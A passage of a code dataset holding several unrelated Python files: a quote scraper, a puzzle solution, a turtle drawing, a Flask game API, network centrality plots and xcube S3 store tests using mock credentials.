enderecoUrl.redefinir()\n        \n        exatoInstante = datetime.datetime.now()\n        print('Requisição nº', (numRequisicao + 1), exatoInstante)\n        \n        # fetch and update the quotes\n        contador = 1\n        for enderecoUrl in listaUrlCotacao:\n            importarConteudoSiteBolsa(enderecoUrl, 'Site' + str(contador) + '.HTML')\n            rep.salvarListaCotacaoAcao(enderecoUrl, exatoInstante)\n            contador += 1\n        \n        for enderecoUrlMoeda in listaUrlCotacaoMoeda:\n            importarConteudoSiteMoeda(enderecoUrlMoeda, 'CotacaoMoeda.HTML')\n            rep.salvarCotacaoMoeda(enderecoUrlMoeda, exatoInstante)\n        \n        # check whether conversion is needed\n        for bolsaValor in listaUrlCotacao:\n            if bolsaValor.moeda != 'R$':\n                nomeArquivoConvertido = exatoInstante.strftime(\"%Y%m%dT%H%M%S\") + '_' + bolsaValor.bolsa + '.csv'\n                converterCotacao(bolsaValor, 'R$', nomeArquivoConvertido)\n    except:\n        print('Ocorreu algum erro nesta requisição. Verifique o acesso a internet e tente novamente', sys.exc_info()[0])\n    \n    print('Fim da requisição nº', (numRequisicao + 1), '. 
Aguardando para próxima requisição.')\n    time.sleep(intervaloRequisicao)\n    numRequisicao += 1 # increment for the next request\n\n# Thanks for the opportunity\n\n\n\n","sub_path":"src/Desafio_ProjetoSJC.py","file_name":"Desafio_ProjetoSJC.py","file_ext":"py","file_size_in_byte":8409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"33275981","text":"\"\"\"\nThis problem was asked by Apple.\n\nSuppose you have a multiplication table that is N by N. That is, a 2D array\nwhere the value at the i-th row and j-th column is (i + 1) * (j + 1) (if\n0-indexed) or i * j (if 1-indexed).\n\nGiven integers N and X, write a function that returns the number of times X\nappears as a value in an N by N multiplication table.\n\nFor example, given N = 6 and X = 12, you should return 4, since the\nmultiplication table looks like this:\n\n| 1 | 2 | 3 | 4 | 5 | 6 |\n\n| 2 | 4 | 6 | 8 | 10 | 12 |\n\n| 3 | 6 | 9 | 12 | 15 | 18 |\n\n| 4 | 8 | 12 | 16 | 20 | 24 |\n\n| 5 | 10 | 15 | 20 | 25 | 30 |\n\n| 6 | 12 | 18 | 24 | 30 | 36 |\n\nAnd there are 4 12's in the table.\n\"\"\"\nfrom utils import units\n\n\ndef check_multiplication_table(N, X):\n    # row n = 1 contributes a match only when X itself fits in the table\n    counter = 0 if X > N else 1\n    for n in range(2, N + 1):\n        q, r = divmod(X, n)\n        # X appears at (n, q) only if n divides X and the quotient is\n        # also a valid column index, i.e. q <= N\n        if r == 0 and q <= N:\n            counter += 1\n\n    return counter\n\n\nif __name__ == '__main__':\n    N = int(input(\"N : \"))\n    X = int(input(\"X : \"))\n    result = check_multiplication_table(N, X)\n    print(\"{} appears {}\".format(X, units(result, \"time\")))\n","sub_path":"problems/dcp0074.py","file_name":"dcp0074.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"556610476","text":"import turtle\n\nFONT_NAME = \"Arial\" \nFONT_SIZE = 30\nFONT_STYLE = \"normal\"\nTEXT_ALIGN = \"center\"\n\ndef write_text(the_turtle,text,x,y):\n    the_turtle.setposition(x, y)\n    the_turtle.write(text, align=TEXT_ALIGN, font=(FONT_NAME, FONT_SIZE, FONT_STYLE))\n\ndef left_node_index(node_index):\n\treturn node_index * 2 + 1\n\ndef right_node_index(node_index):\n\treturn node_index * 2 + 2\n\ndef draw_node(my_turtle,node,x,y):\n\tmy_turtle.penup()\n\tmy_turtle.setpos(x,y)\n\tmy_turtle.pendown()\n\tmy_turtle.circle(20)\n\twrite_text(my_turtle,str(node),x,y)\n\ndef draw_binary_tree(my_turtle,tree,node_index,x,y):\n\tif node_index < len(tree):\n\t\tdraw_node(my_turtle,tree[node_index],x,y)\n\t\tx_move = 20*len(tree)/(node_index+1)\n\t\ty_move = y-50\n\t\tdraw_binary_tree(my_turtle,tree,left_node_index(node_index),x-x_move,y_move)\n\t\tmy_turtle.setpos(x,y)\n\t\tdraw_binary_tree(my_turtle,tree,right_node_index(node_index),x+x_move,y_move)\n\t\tmy_turtle.setpos(x,y)\n\nwindow = turtle.Screen()\nwindow.bgcolor(\"black\")\nbinary = turtle.Turtle()\nbinary.shape(\"turtle\")\nbinary.color(\"white\")\nbinary.pensize(2)\n\ntree = [\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\",\"11\",\"12\",\"14\"]\nint_tree = [int(numeric_string) for numeric_string in tree]\n\ndraw_binary_tree(binary,int_tree,int_tree[0],0,100)\n\nwindow.exitonclick()","sub_path":"binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"69585006","text":"import sys\nsys.path.append('src') \nfrom constants import constants\nimport json\nfrom utils.file_utils import load_dict\nimport processing.text_setup as text_setup\nfrom data.editor_content import EditorContent\nfrom 
editor.content_setup import set_title, set_tags, set_credits, get_language_refs\nfrom langdetect import detect\nimport jsonpickle\n\ninput_file = constants.BASE_INFO\ntranslation_file = constants.TRANSLATION\noriginal_rom_file = constants.ORIGINAL\ncontent_file = constants.CONTENT\n\ndef save_translation_txt(translation_file, translation):\n    with open(translation_file,'w') as translation_file:\n        translation_file.write(translation)\n\ndef save_original_txt(original_rom_file, original_rom_text):\n    with open(original_rom_file,'w') as original_rom:\n        original_rom.write(original_rom_text)\n\ndef save_editor_content(song_data):\n    editor_content = EditorContent()\n    language_refs = get_language_refs(detect(song_data['original']))\n    editor_content.title = set_title(song_data['artist'], song_data['song_name'])\n    editor_content.translation = song_data['translation']\n    editor_content.original = text_setup.mix_original_transliteration(song_data['original'], song_data['transliteration'])\n    editor_content.tags = set_tags(song_data['artist'], song_data['song_name'], language_refs)\n    editor_content.credits = set_credits(song_data['original_url'], song_data['transliteration_url'], song_data['translation_url'], language_refs)\n    editor_content.video_code = \"\"\n    return editor_content\n\ndef process_text():\n    song_data = load_dict(input_file)\n    editor_content = save_editor_content(song_data)\n    with open(content_file, 'w') as outfile:\n        json.dump(jsonpickle.encode(editor_content), outfile)\n    print(\"Todo guardado\")\n\nif __name__ == '__main__':\n    process_text()","sub_path":"src/application/text_processing.py","file_name":"text_processing.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"322242660","text":"# Import database module.\nimport firebase_admin\nimport json\nfrom firebase_admin import db\nfrom firebase_admin import credentials\n\ndef fetchFromDb():\n    # Fetch the service account key JSON file contents\n    cred = credentials.Certificate('./firebase/messaging-18f15-firebase-adminsdk-st2pm-ae4e8ed57e.json')\n    # Initialize the app with a service account, granting admin privileges\n\n    try:\n        firebase_admin.initialize_app(cred, {\n            'databaseURL': 'https://messaging-18f15.firebaseio.com/'\n        })\n    except:\n        print(\"Error Caught\")\n\n    # Get a database reference to our posts\n    ref = db.reference('posts')\n\n    # Read the data at the posts reference (this is a blocking operation)\n    data = json.dumps(ref.get())\n\n    info = json.loads(data)\n\n    location = list(info.items())[-1]\n    return location[1]['body']","sub_path":"MainPyQtGUI/test_path/firebase/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"286161848","text":"import random\n\nfrom flask import abort, Blueprint, g, jsonify, request\n\nfrom app import db\nfrom app.models import Game, Role, Player\n\nnew_game_controller = Blueprint('new_game_controller', __name__, url_prefix='/api/v1/game')\ngames_controller = Blueprint('games_controller', __name__, url_prefix='/api/v1/game/<int:game_id>')\n\ncant_find_game = { 'error': { 'message': 'The game could not be found or is inaccessible.' } }\ncant_find_role = { 'error': { 'message': 'One of the roles could not be found.' 
} }\n\n@new_game_controller.route('/new', methods=['POST'])\ndef new():\n    \"\"\"\n    Create a new Ultimate Werewolf game with the roles\n    and number desired.\n    \"\"\"\n    if len(g.request_json['roles']) < g.request_json['num_center_roles'] + 1:\n        abort(400)\n\n    new_game = Game()\n\n    for role in g.request_json['roles']:\n        for _ in range(role['count']):\n            db_role = Role.query.filter_by(name=role['name']).first()\n            if not db_role:\n                return jsonify(cant_find_role)\n            new_game.players.append(Player(orig_role=db_role, center=False))\n\n    for i in range(g.request_json['num_center_roles']):\n        new_game.players[i].center = True\n\n    g.api_key.games.append(new_game)\n    db.session.commit()\n    return jsonify(new_game.serialize())\n\n@games_controller.url_value_preprocessor\ndef pull_game_id(endpoint, values):\n    \"\"\"\n    Set Game Variable\n    \"\"\"\n    g.game = Game.query.filter_by(id=values.pop('game_id', None), api_key_id=g.api_key.id).first()\n    if not g.game:\n        return jsonify(cant_find_game)\n\n@games_controller.route('/')\ndef get():\n    return jsonify(g.game.serialize())\n\n@games_controller.route('/start')\ndef start():\n    # shuffle in place; assumes roles() returns a list\n    available_roles = g.game.roles()\n    random.shuffle(available_roles)\n\n    for p in g.game.players:\n        p.orig_role = available_roles.pop()\n\n    return jsonify({ 'success': 'true' }), 200\n\n@games_controller.route('/end')\ndef end():\n    # get() takes no arguments; the game is resolved by the URL preprocessor\n    return get()\n\n@games_controller.route('/delete', methods=['DELETE'])\ndef delete():\n    db.session.delete(g.game)\n    db.session.commit()\n    return jsonify({ 'success': 'true' }), 200\n\n@games_controller.route('/players')\ndef players():\n    return jsonify({'players': [p.serialize() for p in g.game.all_players()]})\n\n@games_controller.route('/roles')\ndef roles():\n    return jsonify({'roles': [r.serialize() for r in g.game.roles()]})","sub_path":"app/controllers/games_controller.py","file_name":"games_controller.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"594787441","text":"from searching import binary_string_list\nimport timeit\na_list =['florida','beautifully','gradual','station','sour','apple','safety', 'simple','skilled','core',\n         'transport','pick','anxiously','practically','profession', 'courage','Sunday','funeral','inside','generously']\nfor i in a_list:\n    binary_string_list.list_object.append(i)\nprint(binary_string_list.list_object)\nprint(\"timeit test using one of the words in the list looking for the word 'pick'\")\nt = timeit.Timer(\"binary_string_list.BinaryStringList.binary_search('pick')\", \"import binary_string_list\")\nresults = t.repeat(5, 1000000)\nfor i, item in enumerate(results):\n    print(i, \"\\t\", item)\nprint(\"timeit test using one of the words NOT in the list looking for the word 'dimple'\")\nt = timeit.Timer(\"binary_string_list.BinaryStringList.binary_search('dimple')\", \"import binary_string_list\")\nresults = t.repeat(5, 1000000)\nfor i, item in enumerate(results):\n    print(i, \"\\t\", item)\n","sub_path":"searching/binary_test.py","file_name":"binary_test.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"75669505","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPython coding template for CS-E5740 Complex Networks problem 3.3 (Basic\ncentrality measures).\nWritten by Onerva Korhonen.\n\nOriginal example code created on Mon Aug 25 10:23:54 2014.\nModified to create template 20.10.2015.\nTemplate updated 19.10.2016.\n\n@author: 
aokorhon\n\"\"\"\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pylab as plt\nfrom matplotlib import gridspec\nfrom ex3.colorbar_help import add_colorbar\nimport pickle\n\n\ndef read_network(network_path: str) -> nx.graph:\n \"\"\"\n Reads a given network.\n\n Parameters\n ----------\n network_path: network edge list path (string)\n\n Returns\n -------\n network: NetworkX weighted graph object\n \"\"\"\n return nx.read_weighted_edgelist(path=network_path)\n\n\ndef read_unweighted_network(network_path: str) -> nx.graph:\n \"\"\"\n Reads a given network.\n\n Parameters\n ----------\n network_path: network edge list path (string)\n\n Returns\n -------\n network: NetworkX graph object\n \"\"\"\n return nx.read_edgelist(path=network_path)\n\n\ndef get_centrality_measures(network: nx.Graph, tol: float):\n \"\"\"\n Calculates five centrality measures (degree, betweenness, closeness, and\n eigenvector centrality, and k-shell) for the nodes of the given network.\n\n use NetworkX functions to obtain centrality measure dictionaries\n sort the dictionary values into arrays in the order given by\n network.nodes().\n Hint: make use of get method of dictionaries.\n\n Parameters\n ----------\n network: networkx.Graph()\n tol: tolerance parameter to calculate eigenvector centrality, float\n\n Returns\n --------\n [degree, betweenness, closeness, eigenvector_centrality, kshell]: list of\n lists\n \"\"\"\n\n degree, betweenness, closeness, eigenvector_centrality, kshell = [], [], [], [], []\n betweenness_dict = nx.betweenness_centrality(network)\n closeness_dict = nx.closeness_centrality(network)\n eigenvector_centrality_dict = nx.eigenvector_centrality(network, tol=tol)\n kshell_dict = nx.core_number(network)\n\n for n in network.nodes_iter():\n degree.append(network.degree(n))\n betweenness.append(betweenness_dict[n])\n closeness.append(closeness_dict[n])\n eigenvector_centrality.append(eigenvector_centrality_dict[n])\n kshell.append(kshell_dict[n])\n\n return [degree, betweenness, closeness, eigenvector_centrality, kshell]\n\n\ndef create_scatter(x_values, y_values, x_label, y_label, labels, markers, fig, figure_path: str):\n \"\"\"\n Creates a scatter plot of y_values as a function of x_values. 
\n\n Note that y_values is a list of lists and this function plots the y_values of each list\n against the same x_values.\n\n Parameters\n ----------\n x_values: np.array\n y_values: list of lists\n x_label: string\n y_label: string\n a generic label of the y axis\n labels: list of strings\n labels of scatter plots\n markers: list of strings\n figure_path: string\n\n Returns\n -------\n No direct output, saves the scatter plot at given figure_path\n \"\"\"\n assert len(x_values) > 0, 'Bad input x_values for creating a scatter plot'\n\n ax = fig.add_subplot(111)\n ax.set_xlabel(x_label)\n ax.set_ylabel(y_label)\n\n for (y_value, label, marker) in zip(y_values, labels, markers):\n ax.scatter(x=x_values, y=y_value, label=label, marker=marker, s=40)\n\n ax.legend(loc='best')\n plt.savefig(figure_path, bbox_inches='tight')\n print('Scatter plot ready!')\n\n\ndef visualize_on_network(network, node_values, coords_path, fig,\n titles, figure_path, cmap='OrRd',\n node_size=50, font_size=8, scale=500):\n \"\"\"\n Creates visualizations of the network with nodes color coded by each of the\n node values sets.\n\n Parameters\n ----------\n network: networkx.Graph()\n node_values: list of lists\n coords_path: path to a file containing node coordinates\n fig: matplotlib.pyplot.figure()\n titles: list of strings\n figure_path: string\n cmap: string\n node_size: int\n font_size: int\n scale: int\n used to calculate the spring layout for node positions\n\n Returns\n -------\n No direct output, saves the network visualizations at given path\n \"\"\"\n assert len(node_values[0]) > 0, \"there should be multiple values per node\"\n\n # This is the grid for 5 pictures\n gs = gridspec.GridSpec(3, 4, width_ratios=(20, 1, 20, 1))\n network_gs_indices = [(0, 0), (0, 2), (1, 0), (1, 2), (2, 0)]\n cbar_gs_indices = [(0, 1), (0, 3), (1, 1), (1, 3), (2, 1)]\n\n # Loading coordinates from the file\n with open(coords_path, 'rb') as f:\n coords = pickle.load(f, encoding='latin1')\n\n # Loop over different value sets\n for node_val, title, network_gs_index, cb_gs_index in zip(node_values,\n titles,\n network_gs_indices,\n cbar_gs_indices):\n # Draw the network figure\n ax = plt.subplot(gs[network_gs_index[0], network_gs_index[1]])\n nx.draw(network, pos=coords, node_color=node_val, cmap=cmap,\n node_size=int(node_size), font_size=font_size)\n\n # Draw the colorbar (cb)\n cb_ax = plt.subplot(gs[cb_gs_index[0], cb_gs_index[1]])\n add_colorbar(node_val, cb_ax=cb_ax)\n\n ax.set_title(title)\n\n plt.tight_layout()\n plt.savefig(figure_path, format='pdf', bbox_inches='tight')\n print('Network visualizations ready!')\n\n\ndef main():\n KARATE = \"karate_club_network\"\n\n network_paths = [\n \"small_cayley_tree.edg\",\n \"small_lattice.edg\",\n \"small_ring.edg\",\n \"karate_club_network_edge_file.edg\"\n ]\n\n coords_paths = [\n 'small_cayley_tree_coords.pkl',\n 'small_lattice_coords.pkl',\n 'small_ring_coords.pkl',\n 'karate_club_coords.pkl'\n ]\n\n network_names = ['small_cayley_tree', 'lattice', 'small_ring', KARATE]\n x_label = 'degree'\n y_label = 'centrality measure'\n\n labels = ['betweenness', 'closeness', 'k-shell', 'eigenvector centrality']\n markers = ['.', 'x', '+', 'o']\n scatter_base_path = 'graphs/centrality/'\n titles = ['small cayley tree', 'larger lattice', 'small ring', 'karate club network']\n network_fig_base_path = scatter_base_path\n fig_index = 0\n tol = 10 ** -1 # tolerance parameter for calculating eigenvector centrality\n\n # Loop through all networks\n for (network_path, network_name, coords_path) in 
zip(network_paths, network_names, coords_paths):\n network = \\\n (read_network(network_path) if network_name == KARATE else read_unweighted_network(network_path))\n\n # Calculating centrality measures\n [degree, betweenness, closeness, eigenvector_centrality, kshell] = get_centrality_measures(network, tol=tol)\n kshell_normalized = np.divide(kshell, float(max(kshell))) # normalization for easier visualization\n\n # Scatter plot\n y_values = [betweenness, closeness, eigenvector_centrality, kshell_normalized]\n scatter_path = scatter_base_path + '_' + network_name + '.pdf'\n scatter_fig = plt.figure(fig_index)\n fig_index = fig_index + 1\n\n create_scatter(\n x_values=degree,\n y_values=y_values,\n x_label=x_label,\n y_label=y_label,\n labels=labels,\n markers=markers,\n fig=scatter_fig,\n figure_path=scatter_path,\n )\n\n # Network figures\n network_fig = plt.figure(fig_index)\n fig_index = fig_index + 1\n network_figure_path = network_fig_base_path + '_networks_' + network_name + '.pdf'\n all_cvalues = [degree, betweenness, closeness, eigenvector_centrality, kshell_normalized]\n\n visualize_on_network(\n network=network,\n node_values=all_cvalues,\n coords_path=coords_path,\n fig=network_fig,\n titles=[\"degree\", \"betweenness\", \"closeness\", \"eigenvector_centrality\", \"kshell\"],\n figure_path=network_figure_path\n )\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ex3/ex3/basic_centrality_measures.py","file_name":"basic_centrality_measures.py","file_ext":"py","file_size_in_byte":8229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"99041011","text":"# -*- coding: utf-8 -*-\nimport utils, os, excel_template\nimport spold2_reader as spold2\nfolder = r'C:\\Dropbox (ecoinvent)\\ei-int\\technical\\external\\SRI\\data collection\\SRI_BR_agric\\LUC'\nfilename = 'BR-datasets_20180413.xlsx'\ntab = 'Sheet1'\ndataset_list = list(utils.read_excel(folder, filename, tab)['list'])\nversion = '20180411'\nsystem_model = 'Undefined'\nfolder = utils.version_system_model_path(version, system_model)\nao = utils.pkl_load(os.path.join(folder, 'pkl'), 'ao')\nao_for_AL = utils.ao_for_AL(ao, 'id_to_activity_geo')\ndef to_apply(x):\n s = '{}, {}, {} - {}'.format(x[0], x[1], x[2].split('-')[0], x[3].split('-')[0])\n return s\nao['test'] = ao[['activityName', 'geography', 'startDate', 'endDate']].apply(to_apply, axis = 1)\nao = ao[ao['test'].isin(dataset_list)]\nfilelist = set(ao['filename'])\ndataset_folder = os.path.join(folder, 'datasets')\ndatasets = [spold2.Dataset(dataset_folder, filename, ao_for_AL = ao_for_AL) for filename in filelist]\nresult_folder = r'C:\\Dropbox (ecoinvent)\\ei-int\\technical\\external\\SRI\\data collection\\SRI_BR_agric\\LUC'\nresult_filename = 'BR_crops_without_LUC.xlsx'\nexcel_template.assemble_for_templates(datasets, result_folder, result_filename, \n ao_for_AL = ao_for_AL)","sub_path":"projects/LUC_brazil/8_extract_BR_crops.py","file_name":"8_extract_BR_crops.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"109393201","text":"import unittest\n\nimport s3fs\nimport xarray as xr\n\nfrom test.s3test import S3Test, MOTO_SERVER_ENDPOINT_URL\nfrom xcube.core.new import new_cube\nfrom xcube.core.store import DatasetDescriptor\nfrom xcube.core.store import DataStoreError\nfrom xcube.core.store import TYPE_SPECIFIER_CUBE\nfrom xcube.core.store import TYPE_SPECIFIER_DATASET\nfrom xcube.core.store import 
TYPE_SPECIFIER_MULTILEVEL_DATASET\nfrom xcube.core.store import new_data_store\nfrom xcube.core.store.stores.s3 import S3DataStore\nfrom xcube.util.jsonschema import JsonObjectSchema\n\n\nBUCKET_NAME = 'xcube-test'\n\n\nclass S3DataStoreTest(S3Test):\n\n def setUp(self) -> None:\n super().setUp()\n self._store = new_data_store('s3',\n aws_access_key_id='test_fake_id',\n aws_secret_access_key='test_fake_secret',\n bucket_name=BUCKET_NAME,\n endpoint_url=MOTO_SERVER_ENDPOINT_URL)\n self.assertIsInstance(self.store, S3DataStore)\n\n @property\n def store(self) -> S3DataStore:\n # noinspection PyTypeChecker\n return self._store\n\n def test_props(self):\n self.assertIsInstance(self.store.s3, s3fs.S3FileSystem)\n self.assertEqual(BUCKET_NAME, self.store.bucket_name)\n\n def test_get_data_store_params_schema(self):\n schema = self.store.get_data_store_params_schema()\n self.assertEqual(\n {'anon',\n 'aws_access_key_id',\n 'aws_secret_access_key',\n 'aws_session_token',\n 'endpoint_url',\n 'profile_name',\n 'bucket_name',\n 'region_name'},\n set(schema.properties.keys())\n )\n self.assertEqual({'bucket_name'}, schema.required)\n\n def test_get_open_data_params_schema(self):\n schema = self.store.get_open_data_params_schema()\n self.assertEqual(\n {'chunks',\n 'consolidated',\n 'decode_cf',\n 'decode_coords',\n 'decode_times',\n 'drop_variables',\n 'group',\n 'mask_and_scale'},\n set(schema.properties.keys())\n )\n self.assertEqual(set(), schema.required)\n\n def test_get_search_params_schema(self):\n schema = self.store.get_search_params_schema()\n self.assertIsInstance(schema, JsonObjectSchema)\n self.assertEqual({}, schema.properties)\n self.assertEqual(False, schema.additional_properties)\n\n schema = self.store.get_search_params_schema(type_specifier='geodataframe')\n self.assertIsInstance(schema, JsonObjectSchema)\n self.assertEqual({}, schema.properties)\n self.assertEqual(False, schema.additional_properties)\n\n # TODO (forman): Fixme! 
Currently get boto3 errors when running out-commented test\n # def test_search_data(self):\n # result = list(self.store.search_data(type_specifier=TYPE_SPECIFIER_CUBE))\n # self.assertTrue(len(result) > 0)\n #\n # result = list(self.store.search_data(type_specifier=TYPE_SPECIFIER_DATASET))\n # self.assertTrue(len(result) > 0)\n #\n # with self.assertRaises(DataStoreError) as cm:\n # list(self.store.search_data(type_specifier=TYPE_SPECIFIER_DATASET,\n # time_range=['2020-03-01', '2020-03-04'], bbox=[52, 11, 54, 12]))\n # self.assertEqual('Unsupported search parameters: time_range, bbox', f'{cm.exception}')\n\n def test_get_write_data_params_schema(self):\n schema = self.store.get_write_data_params_schema()\n self.assertEqual(\n {'append_dim',\n 'group',\n 'consolidated',\n 'encoding'},\n set(schema.properties.keys())\n )\n self.assertEqual(set(), schema.required)\n\n def test_get_type_specifiers(self):\n self.assertEqual(('dataset',), self.store.get_type_specifiers())\n\n def test_get_data_opener_ids(self):\n self.assertEqual(('dataset:zarr:s3',), self.store.get_data_opener_ids())\n self.assertEqual(('dataset:zarr:s3',), self.store.get_data_opener_ids(type_specifier='dataset'))\n self.assertEqual(('dataset:zarr:s3',), self.store.get_data_opener_ids(type_specifier='*'))\n with self.assertRaises(ValueError) as cm:\n self.store.get_data_opener_ids(type_specifier='dataset[cube]')\n self.assertEqual(\"type_specifier must be one of ('dataset',)\", f'{cm.exception}')\n\n def test_get_data_writer_ids(self):\n self.assertEqual(('dataset:zarr:s3',), self.store.get_data_writer_ids())\n self.assertEqual(('dataset:zarr:s3',), self.store.get_data_writer_ids(type_specifier='dataset'))\n self.assertEqual(('dataset:zarr:s3',), self.store.get_data_writer_ids(type_specifier='*'))\n with self.assertRaises(ValueError) as cm:\n self.store.get_data_writer_ids(type_specifier='dataset[cube]')\n self.assertEqual(\"type_specifier must be one of ('dataset',)\", f'{cm.exception}')\n\n def test_data_registration(self):\n self.store.s3.mkdir(BUCKET_NAME)\n dataset = new_cube(variables=dict(a=4.1, b=7.4))\n self.store.register_data(data_id='cube', data=dataset)\n self.assertTrue(self.store.has_data(data_id='cube'))\n self.assertTrue(self.store.has_data(data_id='cube',\n type_specifier=TYPE_SPECIFIER_DATASET))\n self.assertTrue(self.store.has_data(data_id='cube',\n type_specifier=TYPE_SPECIFIER_CUBE))\n self.assertFalse(self.store.has_data(data_id='cube',\n type_specifier=TYPE_SPECIFIER_MULTILEVEL_DATASET))\n self.store.deregister_data(data_id='cube')\n self.assertFalse(self.store.has_data(data_id='cube'))\n\n def test_write_and_describe_data_from_registry(self):\n self.store.s3.mkdir(BUCKET_NAME)\n dataset_1 = new_cube(variables=dict(a=4.1, b=7.4))\n self.store.write_data(dataset_1, data_id='cube-1.zarr')\n\n data_descriptor = self.store.describe_data('cube-1.zarr')\n self.assertIsInstance(data_descriptor, DatasetDescriptor)\n self.assertEqual('cube-1.zarr', data_descriptor.data_id)\n self.assertEqual(TYPE_SPECIFIER_CUBE, data_descriptor.type_specifier)\n self.assertEqual((-90.0, -180.0, 90.0, 180.0), data_descriptor.bbox)\n self.assertDictEqual(dict(bnds=2, lat=180, lon=360, time=5), data_descriptor.dims)\n self.assertEqual(('2010-01-01', '2010-01-06'),\n data_descriptor.time_range)\n self.assertEqual({'a', 'b'}, set(data_descriptor.data_vars.keys()))\n\n @unittest.skip('Currently fails on appveyor but not locally, execute on demand only')\n def test_write_and_describe_data_from_zarr_describer(self):\n 
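        # Writes a cube, deregisters it, then describes it: with the registry
        # entry gone, describe_data() must rebuild the descriptor from the
        # zarr store itself, hence the plain dataset type specifier and the
        # full '...T00:00:00' timestamps expected below.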
self.store.s3.mkdir(BUCKET_NAME)\n dataset_1 = new_cube(variables=dict(a=4.1, b=7.4))\n self.store.write_data(dataset_1, data_id='cube-1.zarr')\n self.store.deregister_data('cube-1.zarr')\n\n data_descriptor = self.store.describe_data('cube-1.zarr')\n self.assertIsInstance(data_descriptor, DatasetDescriptor)\n self.assertEqual('cube-1.zarr', data_descriptor.data_id)\n self.assertEqual(TYPE_SPECIFIER_DATASET, data_descriptor.type_specifier)\n self.assertEqual((-90.0, -180.0, 90.0, 180.0), data_descriptor.bbox)\n self.assertDictEqual(dict(bnds=2, lat=180, lon=360, time=5), data_descriptor.dims)\n self.assertEqual(('2010-01-01T00:00:00', '2010-01-06T00:00:00'),\n data_descriptor.time_range)\n self.assertEqual({'a', 'b'}, set(data_descriptor.data_vars.keys()))\n\n @unittest.skip('Currently fails on travis but not locally, execute on demand only')\n def test_write_and_read_and_delete(self):\n self.store.s3.mkdir(BUCKET_NAME)\n\n dataset_1 = new_cube(variables=dict(a=4.1, b=7.4))\n dataset_2 = new_cube(variables=dict(c=5.2, d=8.5))\n dataset_3 = new_cube(variables=dict(e=6.3, f=9.6))\n\n # Write 3 cubes\n self.store.write_data(dataset_1, data_id='cube-1.zarr')\n self.store.write_data(dataset_2, data_id='cube-2.zarr')\n self.store.write_data(dataset_3, data_id='cube-3.zarr')\n\n self.assertTrue(self.store.has_data('cube-1.zarr'))\n self.assertTrue(self.store.has_data('cube-2.zarr'))\n self.assertTrue(self.store.has_data('cube-3.zarr'))\n\n self.assertIn(('cube-1.zarr', None), set(self.store.get_data_ids()))\n self.assertIn(('cube-2.zarr', None), set(self.store.get_data_ids()))\n self.assertIn(('cube-3.zarr', None), set(self.store.get_data_ids()))\n self.assertEqual(3, len(set(self.store.get_data_ids())))\n\n # Open the 3 written cubes\n opened_dataset_1 = self.store.open_data('cube-1.zarr')\n opened_dataset_2 = self.store.open_data('cube-2.zarr')\n opened_dataset_3 = self.store.open_data('cube-3.zarr')\n\n self.assertIsInstance(opened_dataset_1, xr.Dataset)\n self.assertIsInstance(opened_dataset_2, xr.Dataset)\n self.assertIsInstance(opened_dataset_3, xr.Dataset)\n\n self.assertEqual(set(dataset_1.data_vars), set(opened_dataset_1.data_vars))\n self.assertEqual(set(dataset_2.data_vars), set(opened_dataset_2.data_vars))\n self.assertEqual(set(dataset_3.data_vars), set(opened_dataset_3.data_vars))\n\n # Try overwriting existing cube 1\n dataset_4 = new_cube(variables=dict(g=7.4, h=10.7))\n with self.assertRaises(DataStoreError) as cm:\n self.store.write_data(dataset_4, data_id='cube-1.zarr')\n self.assertEqual(\"path '' contains a group\", f'{cm.exception}')\n # replace=True should do the trick\n self.store.write_data(dataset_4, data_id='cube-1.zarr', replace=True)\n opened_dataset_4 = self.store.open_data('cube-1.zarr')\n self.assertEqual(set(dataset_4.data_vars), set(opened_dataset_4.data_vars))\n\n # Try deleting cube 1\n self.store.delete_data('cube-1.zarr')\n self.assertEqual({('cube-2.zarr', None), ('cube-3.zarr', None)},\n set(self.store.get_data_ids()))\n self.assertFalse(self.store.has_data('cube-1.zarr'))\n\n # Now it should be save to also write with replace=False\n self.store.write_data(dataset_1, data_id='cube-1.zarr', replace=False)\n","sub_path":"test/core/store/stores/test_s3.py","file_name":"test_s3.py","file_ext":"py","file_size_in_byte":10415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"63922546","text":"import os\r\nos.chdir(\"C:/Users/jp7de/OneDrive/Desktop/Molecular Beam Slowing/Numerical B_Field/code\")\r\n\r\nimport 
